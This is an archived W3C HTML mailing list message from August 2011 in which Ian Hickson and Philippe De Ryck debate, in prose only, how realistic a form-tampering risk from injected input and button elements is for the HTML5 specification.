W3C home > Mailing lists > Public > public-html-comments@w3.org > August 2011

Re: [html5] Input attributes allow form tampering

From: Ian Hickson <ian@hixie.ch>
Date: Thu, 4 Aug 2011 16:18:29 +0000 (UTC)
To: Philippe De Ryck <philippe.deryck@cs.kuleuven.be>
cc: public-html-comments@w3.org, Giles Hogben <Giles.Hogben@enisa.europa.eu>, Lieven Desmet <Lieven.Desmet@cs.kuleuven.be>
Message-ID: <Pine.LNX.4.64.1108041608500.14637@ps20323.dreamhostps.com>
On Thu, 4 Aug 2011, Philippe De Ryck wrote:
> > 
> > I always hesitate to minimise the risk in security risk assessments, 
> > but this does seem somewhat convoluted. Are you aware of any page that 
> > has such a form, accepts user input, and uses a blacklist rather than 
> > whitelist, and allows <button> or <input> to be inserted unescaped but 
> > not <script>?
> Your requirements for a successful attack are rather strict, since the 
> absence of a script injection attack does not seem necessary. A site 
> vulnerable to injection attacks can still be protected against XSS by 
> additional countermeasures (e.g. NoScript), yet remain vulnerable to 
> this issue

NoScript is a client-side counter-measure used by a minority of users. If 
a site is relying on NoScript to not be vulnerable, then that site has 
lost already.

Thus I do not think that the described conditions are unduly strict.

> If you leave these requirements out, you only need a page with a form 
> and displayed user content, which is vulnerable to an HTML/script 
> injection attack. Concrete example sites are any site with 
> user-generated content (blogs, newspapers with comments, wiki's) and a 
> login form (which is often autocompleted by the browser). Tempting the 
> user to click an injected button with "Some really tempting name or 
> image" should be fairly easy.

Once you have a page where this is possible, sure. I'm just not convinced 
that there are pages that allow form controls but aren't already 
vulnerable to some other equal or worse problem.

Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'
Received on Thursday, 4 August 2011 16:19:00 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 6 January 2015 20:26:27 UTC